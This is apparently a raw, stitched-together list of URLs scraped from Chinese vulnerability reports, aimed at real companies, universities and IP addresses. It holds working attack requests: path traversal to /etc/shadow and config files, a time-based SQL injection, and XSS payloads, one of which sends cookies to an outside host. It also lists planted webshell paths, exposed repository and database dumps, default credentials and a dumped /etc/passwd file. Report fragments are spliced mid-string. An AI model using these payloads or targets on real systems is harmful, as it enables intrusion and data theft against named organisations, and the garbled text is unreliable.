http://218.26.176.181:8082/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 http://tzds.zhcw.com/home/plug.php?do=service&act=check http://bbs.shanggame.com https://172.31.*.100 http://supports.jiaju.sina.com.cn/manage http://211.150.74.101/ http://211.150.74.101/WEB-INF/classes/log4j.properties http://211.150.74.101/WEB-INF/web.xml http://211.150.74.101/WEB-INF/classes/applicationContext.xml http://211.150.74.101/WEB-INF/classes//conf/spring/loginSpring.xml http://211.150.74.101/WEB-INF/classes//com/xmail/wm/login/action/LoginAction.class http://60.28.104.133:9060/yyoa/ http://60.28.104.133:9060/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://**.**.**.**/cf_list.php?id=2 http://**.**.**.**/cf_list.php?id=2 http://www.byd.cn/c:/ http://bbs.browser.qq.com/ajax/genPic?sIconUrl=http://ipaddress/log.png&sUrl=http://127.0.0.1 http://bbs.mb.qq.com/ajax/genPic?sIconUrl=http://ipaddress/log.png&sUrl=http://127.0.0.1 http://**.**.**.**/blog/View.asp?cid=857 http://182.106.215.110:8003/ http://182.106.215.110:8003/Image/f.jsp http://182.106.215.110:8003/Image/index.jsp http://**.**.**.**/ http://oa.sy-yy.com:8989/yyoa/ http://house.baidu.com/guilin/map/searchrect/?city=guilin&minx=999&maxx=999&miny=999&maxy=999&psz=999&dt=1&callback=bdmap.searchcallback http://astro.tsinghua.edu.cn/admin.php http://www.tmsk.cn/img/logo.png/.php http://www.tmsk.cn/bbs/forum.php http://www.tmsk.cn/bbs/uc_server/data/tmp/upload42796.png/.php http://**.**.**.**/console/main.shtml http://dmp.kingdee.com/jenkins/script http://student.sdu.edu.cn/login http://game.gamebean.com/pdmodel_list.php?model=1&s=31&channel=A307 http://bbs.sudu.cn/ www.scrcoa.com/yyoa/ www.scrcoa.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://**.**.**.**/v_show/id_XMTQ0OTIwMDY0NA==.html http://220.181.112.47/monife/templates/visualize4.php?nodeid=null http://admin.apps.v1.cn http://**.**.**.**:80/extpmsPdtInfo.do http://admin.iask.sina.com.cn/.svn/entries信息泄漏漏洞(目前已修补) http://202.108.103.161:9999/htcsp/ http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getMac http://202.108.103.161:9999/htcsp/ https://updates.venustech.com.cn/ http://**.**.**.**/soc_singleStuInfo.php?id=271 http://git.oschina.net/ jdbc:oracle:thin:@192.168.1.207:1521:orcl http://192.168.10.188:10101/mfbms-app-web/webservice/ChannelService http://192.168.7.249:8080/mfbms-app-web/webservice/ChannelService http://192.168.10.188:8891/mfbms-app-web/webservice/ChannelService http://192.168.10.188:10101/mfbms-app-web/webservice/ChannelService http://58.250.66.188:8974/mfbms-app-web/webservice/ChannelService http://192.168.10.188:10101/mfbms-app-web/webservice/ChannelService http://58.250.66.188:8974/mfbms-app-web/webservice/ChannelService http://192.168.3.241:8080/mfbms-app-web/webservice/ChannelService jdbc:oracle:thin:@192.168.10.217:1521:jrldDB http://www.zhaopiao.net/ http://id.gionee.com/members/start#/ http://id.gionee.com/.git/ http://www.chinanetwork.com.cn http://114.251.127.194:8000/Web_sc/login.gn http://zixun.baihe.com http://**.**.**.**/ http://i.leju.com/index.php这个链接来重置账号 http://udc.leju.com/Settings/Index/index依旧是四位的 http://**.**.**.**/ext/xxx.crx http://**.**.**.**/xxx/xx.zip http://www.ztesun.com/product.asp?keyword=-1 http://brand.wandahotels.com/ http://brand.wandahotels.com/%E6%8E%92%E9%99%A4%E7%9B%AE%E5%BD%95.txt http://brand.wandahotels.com/sql/.svn/entries http://brand.wandahotels.com/sql/wandahotel_20151118.sql http://brand.wandahotels.com/sql/wandahotel_20151121.sql http://60.10.8.130/存在同样的问题 http://lib.wap.zol.com.cn/ipj/rss/subscribe/?v=1.0&imei=A0000038518D0C http://lib.wap.zol.com.cn/ipj/readCalender/uploadRecord/ http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath=/doc/../../../../../../../etc/shadow http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath=/doc/api.pdf http://homesecurity.haier.com/HaierAF/login4webapp/downLoadFile.action?filePath=/doc/../WEB-INF/classes/config-database.properties http://s.p.qq.com/pub/jump?d=AAAar0by&TveiEdOavlhXhmMFEvihDEPyOJWbZU_wv=1027 http://coehm.pw/,页面伪造QQ空间登录页面,可钓鱼。并且已被攻击者利用,恶意信息活跃于各大社交平台。 http://www.hp1997.com/ http://www.flold.ecnu.edu.cn/manage/index.asp http://www.flold.ecnu.edu.cn/manage/login/login.asp http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15730 http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15718 http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15655 http://218.75.77.62/modifyAddress.action?customerAddressDTO.seq=1&customerAddressDTO.customerId=15633 http://gmccpdm.midea.com.cn:8889/ cn:8889 http://oa.gykgnmg.com/yyoa/index.jsp http://218.5.65.215:8080/yyoa/ http://202.108.145.35:8888/is/index.jspx http://dhapi.dahebao.cn/search/search?userId=jsh569cfc523181e903527857&type=1&keywords=人&size=10&page=0&v=4.0&ty=a&appid=1234567890&dt=&tn=569cfc5ccd3ec247504638 http://dhapi.dahebao.cn/search/search?userId=jsh569cfc523181e903527857&type=1&keywords=人% http://www.wlxnsyzx.sdnu.edu.cn/ http://www.wlxnsyzx.sdnu.edu.cn/admin/login.asp http://**.**.**.**:7001/存在“Java http://mitv.tcl.com/DRP/,TCL员工直销平台订单管理系统。 URL:http://dckf.digitalchina.com http://dckf.digitalchina.com/index.php/qa/qainput?isetup=1&id=374 http://**.**.**.**/default/ http://**.**.**.** http://220.181.163.252/ http://220.181.163.252/nohup.out发现好像被人插入后门(见最后两张图,还请自查) http://**.**.**.**:7001存在JAVA反序列漏洞 http://**.**.**.**/cx/cx/Login.asp http://oa.shfft.com/ http://oa.shfft.com/ftp/im/160115162247328_69393137.jsp http://news.stuclub.cn/sanzi.php,id参数下没有过滤敏感字符如http://news.stuclub.cn/sanzi_show.php?id=346 http://cs.kuaidi100.gionee.com/login http://photo.made-in-china.com/ http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/xyz//server_4.0/etc/apache2/httpd.conf http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/mic_en_file_upload.sh http://photo.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://4s.mysirui.com/ http://cauef1.cau.edu.cn/read_article.jsp?col=23&id=1264 http://cauef1.cau.edu.cn/read_article.jsp?col=23&id=1264 https://**.**.**.**/gateway/1.jspx http://test2.m.letv.com:443/.svn/entries http://dckf.digitalchina.com/uploads/100/tunnel.php URL:http://10.1.122.240:806/ http://**.**.**.**/temple/intro_t_history.php?t_id=20 http://img.zhaopiao.net.cn/app/down/appdownload.html http://union.baidu.com/client/cooperation/cpro/filter/cproUrlFilterMgr!save.action http://**.**.**.**/eboss/login.jsp http://**.**.**.**/ http://202.120.44.237/manager/html http://202.120.44.237 http://**.**.**.**:7567/phpmyadmin/index.php http://**.**.**.**:7567/phpmyadmin/index.php http://**.**.**.**:7567/phpmyadmin/index.php http://**.**.**.**:7567/phpinfo.php http://cazx.changan.com.cn/live800/downlog.jsp?path=/&fileName=/etc/passwd http://hr.cnht.com.cn:11000/ehr/login.jspa)存在java反序列化漏洞导致getshell(之前白帽子提交的弱口令漏洞依然没修复,但是已经公开了)。 http://bang.weibo.com/meiti/shengfen?date=20150901 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://etcrm.net263.com/ m.koolearn.com/sheying/index/detailed/id/680 http://www.secwk.com/article/app/detail/810119111430919514 index.php/Web/Customer/getShopLine http://elutongxing.com/ elutongxing.com/linelist.html http://diaocha.360che.com/thread-397430-58-1.html http://diaocha.360che.com/viewthread.php?tid=397430&page=58 http://**.**.**.**/temple/intro_t_photob.php?tp_id=138&p=4 http://www.changan-mazda.com.cn/activity/index?year=2015&page=1 http://www.cetools.cn/index.php/cetools_admin/login http://qiantu.xdf.cn/wcm http://m.made-in-china.com/ http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/sysconfig/network-scripts/ifcfg-eth0 http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://m.made-in-china.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://218.62.24.136/checklogin.asp index.php/search-result.html http://www.laiyifen.com http://**.**.**.**/isc/block/view/sn/456* http://study.kingsunsoft.com/fzsyncadmin/VersionManage/AddVersionManage.aspx?ID=0 http://v.qq.com/bar/10276/post/6084799421411834686/comment/h5?%20lrr=http://webxss.cn/kX8S8e?1453214742 index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLWFIUjBjRG92TDNSMVlXNW5iM1V1YkdGcGVXbG1aVzR1WTI5dEx3PT0uaHRtbA%3D%3D http://tuangou.laiyifen.com http://cc-b233.bokecc.com:8042/node/node http://119.254.81.185:8088/cluster/apps http://ms.wanglibao.com/.svn/entries http://c2.dongfeng-citroen.com.cn/.svn/entries http://dealer.dongfeng-citroen.com.cn/.svn/entries http://elysee.dongfeng-citroen.com.cn/elysee.tar.gz http://spring.dongfeng-citroen.com.cn/ http://e.xbwl.cn/ www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 e.xbwl.cn/website/aboutXB/11.jsp%3FpageType%3D00%26subType%3D0%26fw%3D320 http://220.178.6.140:8080/defaultroot/login.jsp http://220.178.6.140:8080/console/login/LoginForm.jsp shell1:http://220.178.6.140:8080/ca/ shell2:http://220.178.6.140:8080/defaultroot/upload/gov/one.jsp http://www.zdpxmidea.com/index.php?m=Con&a=logout http://gamedb.766.com/hon/hero/search.html www.hualife.cc http://v6.bang.weibo.com/aj/wemedia/rank?ajwvr=6&__rnd=1453197393175 com:8989/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://118.144.76.14 http://118.144.76.14/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../ ip:218.108.5.6 http://www.apnic.net/db/dbcopyright.html bt:/var/www# http://120.26.14.66/.svn/entries http://sdk.g.baofeng.com/.git/config http://weixinkaifa.7433.com/test.php http://datacenter.ak.cc/php.php http://jxcg.scu.edu.cn/Backet/login/index https://link.zhihu.com/?target=http://www.baidu.com https://link.zhihu.com/?target=http://ricter.me:8000%3F"%2Bdocument.cookie// http://**.**.**.**/townrcbnews.php?id=71 http://st.hujiang.com/topic/167082907031/,是一个社团什么的。过滤了很多,但是 http://test.msdays.com/xss.swf https://**.**.**.**/welcome.php http://taihu.17500.cn/api/index/find/fid/13275 http://www.zte.com.cn/mobile/uaprof/N988.xml http://taihu.17500.cn/api/index/find/fid/13275 http://mail.huatu.com https://github.com/Manchester117/HighPin_VIK/blob/1ab3a97f27cea807a7497bad213f2fa73486bfd4/configure.conf http://nc.cofco.com/ http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://piao.962168.com/user/tokenAction!toTokenInfoModPage.action?id=111812 http://**.**.**.**/)存在SQL注入。 http://**.**.**.**/NewsWebUI/NewSearchMapFrame.aspx?organid=1&searchText=1(organid参数)。 http://nc.womaiapp.com nc.womaiapp.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://**.**.**.**/uapws/ http://sem.baidu.com/site/index http://cc.263.net/toReSetUserPwd http://www.newchinalife.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://oa.sino-tcm.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://**.**.**.**/weixinapp/bdsfz.asp https://github.com/a1357479/techan/blob/5792d078790f56dc1b852ba23e863ecfe851cf34/Application/Common/Conf/config.php https://www.idwzx.com/api/v2/loans/getCrowdFundLoanWithPage?pageSize=10&status=SCHEDULED&loanType=CROWDFUND¤tPage=2&orderBy=timeOpen https://www.idwzx.com/api/v2/loans/getCrowdFundLoanWithPage?pageSize=10&status=SCHEDULED&loanType=CROWDFUND¤tPage=1&orderBy=timeOpen https://www.idwzx.com/api/v2/loans/getLoanWithPage http://**.**.**.** http://**.**.**.** http://ocs.xiamenair.com.cn/live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**//swcxinfodata/addfile/kmgs/yxddly/addfile/160120/01453283824688295.jsp 1.asp/xx解析成asp脚本 https://effevo.com/ https://effevo.com/app/admin/#/login http://**.**.**.**/service/fee/zxkf.shtml http://zhuanzhuan.58.com/zz/transfer/getRecommendInfoForWZ http://3g.letao.com/wap/app_download.aspx?op=brand&bid=14 http://wzgyl.chinagasholdings.com/ http://huan.letao.com/wap/app_download.aspx?op=brand&bid=10 http://eboss.gjzq.cn/eboss/login.jsp http://www.chinamacro.cn/console/ http://scm.chinamacro.cn:8001/ http://scm.chinamacro.cn/console/ http://218.13.34.122:8082/ http://www.chinamacro.cn/h/f.jsp http://218.13.34.122:8082/f.jsp http://scm.chinamacro.cn/f.jsp http://science.ijournals.cn/jsunature_cn/ch/common_item.aspx?is_three_menu=0&line_num=16&parent_id=20061209112853001&menu_id=20061209122600001 www.letao.com http://www.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0 http://www.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=GPJsD2Gh%27;%20waitfor%20delay%20%270:0:2%27%20--%20&form=0&op=newadd&pid=110000&tid=0 http://web.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0 http://mobile.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0 http://wspxreg.91huayi.com http://hr1.wahaha.com.cn/ http://bookshop.sjtup.com/ http://bookshop.sjtup.com/buycoursebook/detail?orderNo=2016012000050 http://www.mrhi.cn www.saywash.com http://cloud.im-cc.com/后台的管理密码,用的也是腾讯云的东西 http://piao.962168.com http://connect.qq.com/widget/shareqq/index.html?url=http://www.qzonerer.com/atiklc/test.php&desc=&title=&summary=&pics=http://www.qzonerer.com/atiklc/test.php&flash=&site=&style=201&width=32&height=32 http://siyue.jinku.com/index.php/Index/slist?aid=3703 http://notice.boyaa.com/.svn/entries https://mail.boyaa.com https://sslvpn.boyaa.com http://basic.oa.com/user/myInfo/495 http://basic.oa.com/user/myInfo/1 www.oa.com http://iddz.oa.com/lywiki/index.php?edition-compare-1 http://rmp.haier.net/ http://rmp.haier.net/kindeditor/php/file_manager_json.php?path=/ http://rmp.haier.net/kindeditor/php/file_manager_json.php?path=/opt/lampp/htdocs/ hr1.wahaha.com.cn/kb http://www.ultrapower.com.cn/webportal/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0126617 http://**.**.**.**//perResumeView.action?id=501202 http://203.195.239.253:8090/login.do http://203.195.239.253:8090/1.jsp http://www.zouquwan.com/common/Server_Default.aspx?ColId=2 http://erp.suning.com.cn http://erp.suning.com.cn/uapws/service http://erp.suning.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl erp.suning.com.cn/uapws/ http://58.215.43.17:7001 http://58.215.43.17:7001/payment/cssroot.jsp http://wooyun.org/bugs/wooyun-2013-040516 https://180.166.152.80/index.html http://www.kysec.cn/qk/tools/Main.aspx页面时 http://www.kysec.cn/qk/tools/main.aspx?path=/../ http://heuet.ss.cqvip.com/user/blog_search.aspx?keywords=u&subid=237 http://travel.sina.com.cn/fj_sanming_685-xiangqing-gonglue/ http://u.travel.sina.com.cn/api-i/qa/sendweibo?content=asdf1&callback=jQuery17206884582478087395_1452354554166&_=1452354673975 http://travel.sina.com.cn.zhchbin.xyz/ http://travel.sina.com.cn/aolanduo_2998-xiangqing-gonglue/ http://data.travel.sina.com.cn/award/friendships.php?uid=1684037597×=1453205469390&callback=jQuery172005376373999752104_1453205445886&_=1453205469391 http://36.48.189.176/doc/page/login.asp http://218.28.132.194/建业集团 http://61.163.95.187/建业控股 http://218.28.3.86/建业物业 http://218.29.103.146/建业泰宏 http://61.163.86.141:8080/建业集团 http://218.28.132.194/web-console http://218.28.132.194/jbossass/jbossass.jsp http://61.163.95.187/web-console http://61.163.95.187/jbossass/jbossass.jsp http://218.28.3.86/web-console http://218.28.3.86/jbossass/jbossass.jsp http://218.29.103.146/web-console/ http://218.29.103.146/jbossass/jbossass.jsp http://61.163.86.141:8080/web-console/ http://61.163.86.141:8080/jbossass/jbossass.jsp http://dtsmt.gw.com.cn/ https://iexam.h3c.com/customize/nwc_user_enterprise/login/login.html kali:/usr/share/sqlmap/output# https://iexam.h3c.com/site/ajax/WebSiteAjax.aspx?type=hits&ContentUid=123* http://sqlmap.org index.php/Service/renzheng http://www.pldsec.com/ www.pldsec.com http://202.100.22.12/ http://202.100.22.12/uddiexplorer/css.jsp http://www.trjcn.com/ www.trjcn.com http://jpk.sicau.edu.cn/2007/4zwslx/newsinfo.asp?id=79 http://**.**.**.**/wooyun/index.jsp http://**.**.**/portal/setPwdphone=13888888888&yhms=administrator_ http://m.trjcn.com/manage/user_cert/email.html http://m.trjcn.com http://m.trjcn.com/manage/user_cert/email.html http://**.**.** http://**.**.**/apply/websiteDetailInfowebSiteId=23333&flag=1_ http://mail.cntv.cn/ http://122.227.246.125/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml http://edu.newcapec.com.cn/Home/Index/news/id/49* http://www.newcapec.cn/index001.html http://office.newcapec.net:3216/ http://office.newcapec.net:5200/ims/default.aspx http://office.newcapec.net:3456/js/ewebeditor/ http://office.newcapec.net:3456/js/ewebeditor/admin/login.php http://madata.hc360.com/mobileweb/m/get/Ad?type=1&kind=1&mainind=030 service.zhaopin.com/live800/loginAction.jsp?companyLoginName=1&loginName=a111&password=111 http://101.227.240.110:8989 http://user.mapi.jiashuangkuaizi.com/Activity/GetByPageKey awift00:00:00:00:00:00&_osversion=4.4.2&_platform=Android&_screen=720x1280&_time=2016-01-21 http://user.mapi.jiashuangkuaizi.com/Activity/GetByPageKey awift00:00:00:00:00:00&_osversion=4.4.2&_platform=Android&_screen=720x1280&_time=2016-01-21 http://live800.wan.renren.com/live800/loginAction.jsp?companyLoginName=1*&loginName=a111&password=111 http://cloud.jixiangkeji.com/data/可以目录遍历,http://cloud.jixiangkeji.com/data/upload/user/idcard/ http://cloud.jixiangkeji.com/data http://oa.gkzj.com/yyoa/ http://222.189.156.67:8089/yyoa/ http://office.newcapec.net:5200/ims/prompt.aspx?msg=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&type=type http://office.newcapec.net:5200/ims.rar http://58.59.14.99/vpmweb/login.jsp http://58.59.14.99/invoker/JMXInvokerServlet(admin、admin) http://211.160.21.126:7002/EICS/jsp/login.jsp www.google.com/images/logo.png http://mail.qq.com/xxx/?sid=sid&xxxxxx www.google.com www.google.com http://oa.cofco-keystone.com:8083 http://www.ccib.com.cn/CHN/Home/HomeShow.asp?ContentID=4076 http://219.143.162.216:7002/ht_server http://econ.shufe.edu.cn/login.php http://www.12321.cn http://apps.lib.whu.edu.cn/newbook/show.asp?a=631622 http://apps.lib.whu.edu.cn/skdh/xx/expert.asp?f_type=1 http://apps.lib.whu.edu.cn/skdh/gj/t_elib.asp?a=2 http://apps.lib.whu.edu.cn/jcxt/smkx.asp http://202.194.7.171:8080/sdw/ https://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.**/index.php?do=show&page=3-3&id=2 http://eoa.septwolves.net:8084/carddata.aspx?uid=chenxiaom http://218.107.193.6:8200/login.aspx http://**.**.**.**/ally/list_in.php?ID=181&res_number=U2013061822564 http://182.151.206.253/ http://**.**.**.**/?view=member_center%2Fpatient_editor&patientId=111 http://**.**.**.**/?view=member_center%2Fpatient_editor&patientId=4081407 http://office.newcapec.net:2080/eCard/UKeyCode.aspx https://e-trade.ftsfund.com http://edison.wahaha.com.cn http://admin.apps.v1.cn/ http://**.**.**.**/getjob.ashx https://mail.njzq.com.cn/owa/ http://dealer.youxinpai.com/ http://tgb.changyou-inc.com/newspread/acegilogin.jsp http://**.**.**.**/myapp/detail.htm?apkName=org.ajmd http://**.**.**.**/apps/org.ajmd http://**.**.**.**/get_zhuanti_html.php?zid=95 http://203.74.57.13/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash exim:x:93:93::/var/spool/exim:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin ident:x:98:98::/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh lkkspp:x:500:500::/home/lkkspp:/bin/bash ronggenyou:x:0:0::/home/ronggenyou:/bin/bash http://**.**.**.**/Website/newsshow.jsp?id=346 http://ecshub.foxconn.com/System/RegistUser/RegistUserEdit.aspx?billno=USG201510300001 http://servexpress.digitalchina.com/sms/login.asp http://servexpress.digitalchina.com//sms/PwdExpired.asp http://servexpress.digitalchina.com/sms/change_inf.asp http://61.142.114.205/6.jsp http://61.142.114.197/4.jsp?o=vLogin http://61.142.114.203/3.jsp http://61.142.114.201/1.jsp http://61.142.114.199/5.jsp http://www.jftzf.com/business/search http://www.jftzf.com/product/index?area=15 https://app.travelsky.com/ad//webService/message/house.action http://bk.travelsky.com/ http://bk.travelsky.com/bkair/page/users/front/userLogin.jsp http://mapi.jiashuangkuaizi.com/public/development?bdid=563&sid=0 https://**.**.**.**/invoker/JMXInvokerServlet http://db.beijing.com.cn/nagiosql//index.php http://**.**.**.**/v6/get_user_home.php http://bm.chinabond.com.cn/bm/jsp/eixtremove.esp http://appstore.sugon.com/sugonstore/index.php?r=app/detail&id=68 http://ec.1jiajie.com http://ec.1jiajie.com/order/contract-order-view?cid=1265 http://hhb.yisence.cn:89/admin/admin_index.asp http://121.15.209.216/ http://ds34.digitalchina.com/surface/ http://**.**.**.**/login.html http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp http://sjxy.ycu.jx.cn/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=%2F http://m4.xianguo.com/homeindex/list?cid=1&tagid=6_31 http://**.**.**.**/login.html http://365webcall.2office.cn/ http://www.kf5.com/resources/index/id/* http://www.brandwisdom.cn http://www.1510cloud.com/ www.1510cloud.com http://wmarxism.fudan.edu.cn/admin/login.aspx http://e.xbwl.cn/office!findOffice.action http://mju.ss.cqvip.com/user/blog_search.aspx?keywords=i&subid=0 http://www.changhongit.com/ https://124.205.58.242:8880/ https://app.travelsky.com/ad//webService/advert-activ/buyOrder.action http://www.feiren.com/ www.feiren.com http://202.100.226.94:7001 ip:202.105.46.58 bt:/var/www# http://**.**.**.**/codereceive.php?cid=1 http://**.**.**.**/codereceive.php?cid=1 http://fax.2office.cn http://www.gdsto.com.cn/ www.gdsto.com.cn http://*****ifeng.com/sale/search/24737/_/_/11_0_0_0_0_0_0_0_0_0_0_0_0_11.shtml?keyword=_** http://admin.xiaomm.com.cn/ http://admin.xiaomm.com.cn/default.aspx URL:http://**.**.**.**:9100/claimWeb/claimQuery.jsp http://www.wdhac.com.cn/xml/Cms_XML_GBK.jsp?optionalparam=-1&cf=3467&randomId=0.9538818406872451&actiontype=1&id=1201 www.inke.tv http://agent.sfn.cn/domain/list http://agent.sfn.cn http://app.oeeee.com/user/modify QVQmy57RWTPVf16LHm60DuYvgWTy58AUCs8XMArOFTlMkR4C9367W7RLstT:DbNPSF4hFw6lNUs http://**.**.**.**/zhhxpm/sys/Login_dologin.action http://**.**.**.**/oa/sys/Login_dologin.action http://**.**.**.**:8888/shssy/sys/Login_dologin.action http://**.**.**.**/pm/sys/Login_dologin.action http://**.**.**.**:8888/ http://**.**.**.**:8888 http://3g.jstv.com/server/SubjectDetail_common.aspx?action=more&callid=712_1453600588041&fanye=1&styleid=-1 http://bbs.cits.com.cn/easoa/themes/mskin/login/login.jsp http://bbs.cits.com.cn http://oa.meiyijia.com.cn:8010/c6/ZdyWeb/Kfpeixun/ http://boss.myj.com.cn/PersonalCenter/UploadUserTop.aspx www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com http://kh.avicsec.com:8800/resin-doc/viewfile/?file=index.xtp http://kh.avicsec.com:8800/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://kh.avicsec.com:8800/resin-doc/doc/%20.xtp http://kh.avicsec.com:8800/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/classes/example/PeriodicTaskServlet.java http://210.21.204.105 http://apk.gfan.com/Product/App718165.html http://121.14.65.32:8080 URL:http://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B www2.kugou.kugou.com,但明显域名是cname在CDN节点了。 http://183.61.119.243/show/show/more/type=10&orderby=hits&page=1&page_size=24 http://**.**.**.**/ http://**.**.**.**/sms/toMain.action http://chongjian.cqu.edu.cn/bknews_view.php?titleid=1&id=347 http://wx.landray.com.cn http://202.98.11.145 http://pms.hengtech.com.cn/pms/ com:9704/115.231.105.61:9704就发现了weblogic是存在java反序列命令执行的 http://xdx.sinosafe.com.cn/webhelp/register/forgot_pwd.jsp#anchor_content http://**.**.**.**:8880/ http://**.**.**.**:8880/emptywar/f.jsp?o=vLogin http://agenttest.sinosafe.com.cn:8888/shop/member/findPwd/ http://58.251.33.183/ http://**.**.**/USMS/Default.aspx http://acc.rxdai.com:8585/EmployeeQuery/Login.aspx并没验证码之类的验证。想到top1的弱口令12456就拿出来配合跑了下。从以前的帖子里面找到了相关的账号,然后结合Burp跑下 http://sce.suning.com/ http://www.jaguar.com.cn/index.html http://113.54.11.225/ http://e.waimai.meituan.com/ http://e.meituan.com/ http://cssurvey.foxconn.com/admin/study.aspx http://www.kuwo.cn/cgi-bin/test-cgi http://yinyue.kuwo.cn/cgi-bin/test-cgi http://tupian.kuwo.cn/cgi-bin/test-cgi 